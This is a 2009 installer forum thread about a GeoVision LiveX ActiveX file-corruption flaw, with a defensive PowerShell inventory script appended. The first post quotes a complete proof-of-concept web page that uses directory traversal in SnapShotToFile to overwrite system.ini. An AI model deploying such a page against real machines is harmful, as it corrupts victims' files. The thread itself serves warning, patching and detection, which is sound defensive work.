bchance (Posted February 25, 2009)

Vulnerability Released Feb. 16th 2009:

    <!--
    GeoVision LiveX_v8200 ActiveX Control (LIVEX_~1.OCX) remote file corruption poc
    by Nine:Situations:Group::SnoopyAssault
    site: http://retrogod.altervista.org/

    working against IE8b/xpsp3, safe for scripting and for initialize.

    LiveX_v7000 with clsid {DA8484DE-52DB-4860-A986-61A8682E298A}
    LiveX_v8120 with clsid {F4421170-DB22-4551-BBFB-FFCFFB419F6F}
    have the same SnapShotToFile() and SnapShotX() methods

    this poc connects to a live demo server and replaces system.ini with jpeg content...
    could we set arbitrary content (???) ... maybe trough a fake server, checking ...
    -->
    <html>
    <head>
    <script language="JavaScript">
    function sleep(n) {
        var now = new Date();
        var exitTime = now.getTime() + (n*1000);
        while (true) {
            now = new Date();
            if (now.getTime() > exitTime) return;
        }
    }
    </script>
    </head>
    <body>
    <object classid="clsid:8D58D690-6B71-4ee8-85AD-006DB0287BF1" id="WebCamX1" width="360" height="300">
    <param name="IpAddress" value="http://24.248.47.203" ref> <!-- demo server -->
    <param name="DisablePWD" value="-1">
    <param name="UserName" value="wec">
    <param name="Password" value="">
    <param name="CommandPort" value="4550">
    <param name="DataPort" value="5550">
    <param name="AudioDataPort" value="6550">
    <param name="BandWidth" value="LAN">
    <param name="FixSize" value="0">
    <param name="FixWidth" value="320">
    <param name="FixHeight" value="240">
    <param name="SvrType" value="0">
    <param name="AutoLogin" value="0">
    <param name="DefaultCam" value="1">
    <param name="AutoReConnect" value="-1">
    <param name="MaxRetries" value="-1">
    <param name="RetryInterval" value="70">
    </object>
    <script language="JavaScript">
    sleep(2);
    //WebCamX1.SetCntDeviceType(0);
    //WebCamX1.EnableAutoScreenSize(1);
    //WebCamX1.SetInfo(125,1,0,"","");
    //WebCamX1.SetInfo(129,1,0,"","");
    //WebCamX1.SetUpdateInfo(100, "WebCam", 0, "", 8200, 0,0);
    //WebCamX1.DefaultCam = 1;
    WebCamX1.PlayX();
    sleep(2);
    WebCamX1.SnapShotToFile("../../../../../../../../../../../windows/system.ini");
    WebCamX1.SnapShotX();
    </script>
    </body>
    </html>

Great... so basically now if you have a client who can view their cams from the internet (not LAN) and some hacker cracks/guesses the password they can severely mess with your system. The notes in the writeup suggest they are looking into submitting arbitrary code into the DVR such as a virus or a backdoor. This could certainly endanger your clients. I've spoken with USAVision and they have escalated it to the engineers as well as notified the HQ. This is not good.

brankorackovic (Posted February 25, 2009)

Is this from GV v8.2?

bchance (Posted February 25, 2009)

ver 8.2
ver 8.120
ver 7.0

These three, per the author's notes, are vulnerable due to the method of saving snapshots. Once again, not good.

rory (Posted March 1, 2009)

I can't verify this even works as I don't have a test DVR right now. However, even if it does, it shouldn't do anything as system.ini is not an executable.

bchance (Posted May 7, 2009)

Sorry to dig this up but just wanted to let everyone know that you need to update your systems to 8.3. The 8.3 update was not just for new features but for certain security aspects. There have been at least 3 brand new vulnerabilities since 09. Two in February and one in March. Feel free to google Geovision Vulnerability so you can understand how big of an issue this is. A lot of companies spend all their time getting the jobs done and not securing things that hold their reputation. For instance leaving default passwords on routers, switches, cameras, and software. In this case it's keeping your software updated. If old versions are out there they are vulnerable.
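
To find client PCs that still have one of the affected controls registered, the following PowerShell inventory is an added example, not part of the original thread and not GeoVision's own tooling. It uses the three CLSIDs given in the PoC in the first post; the registry locations are the standard machine-wide COM and Internet Explorer "ActiveX Compatibility" keys, and per-user registrations are not checked.

```powershell
# Added example (not from the thread): report which LiveX controls named in the
# PoC notes are registered on this PC. CLSID/version pairs come from the first post.
$LiveXClsids = @{
    '{8D58D690-6B71-4EE8-85AD-006DB0287BF1}' = 'LiveX_v8200'
    '{DA8484DE-52DB-4860-A986-61A8682E298A}' = 'LiveX_v7000'
    '{F4421170-DB22-4551-BBFB-FFCFFB419F6F}' = 'LiveX_v8120'
}
# Machine-wide COM registration and IE "ActiveX Compatibility" keys, for the
# native registry view and the 32-bit view on 64-bit Windows.
$Views = @(
    @{ Name    = 'native'
       Classes = 'HKLM:\SOFTWARE\Classes\CLSID'
       Compat  = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' },
    @{ Name    = 'wow6432'
       Classes = 'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID'
       Compat  = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility' }
)
$KillBit = 0x400   # "Compatibility Flags" bit that stops IE from loading a control

function Get-LiveXControlStatus {
    foreach ($view in $Views) {
        foreach ($clsid in $LiveXClsids.Keys) {
            $serverKey = Join-Path (Join-Path $view.Classes $clsid) 'InprocServer32'
            if (-not (Test-Path -LiteralPath $serverKey)) { continue }   # not registered

            # The default value of InprocServer32 is the path to the OCX.
            $ocx = (Get-ItemProperty -LiteralPath $serverKey).'(default)'
            $fileVersion = $null
            if ($ocx) {
                $ocx = [Environment]::ExpandEnvironmentVariables($ocx.Trim('"'))
                if (Test-Path -LiteralPath $ocx) {
                    $fileVersion = (Get-Item -LiteralPath $ocx).VersionInfo.FileVersion
                }
            }
            $compatKey = Join-Path $view.Compat $clsid
            $flags = (Get-ItemProperty -LiteralPath $compatKey -Name 'Compatibility Flags' `
                        -ErrorAction SilentlyContinue).'Compatibility Flags'
            [pscustomobject]@{
                Control      = $LiveXClsids[$clsid]
                Clsid        = $clsid
                RegistryView = $view.Name
                OcxPath      = $ocx
                FileVersion  = $fileVersion
                KillBitSet   = ($null -ne $flags) -and (($flags -band $KillBit) -ne 0)
            }
        }
    }
}
Get-LiveXControlStatus | Format-Table -AutoSize
```

No output means none of the three controls is registered machine-wide; any row with KillBitSet false is a control Internet Explorer will still load.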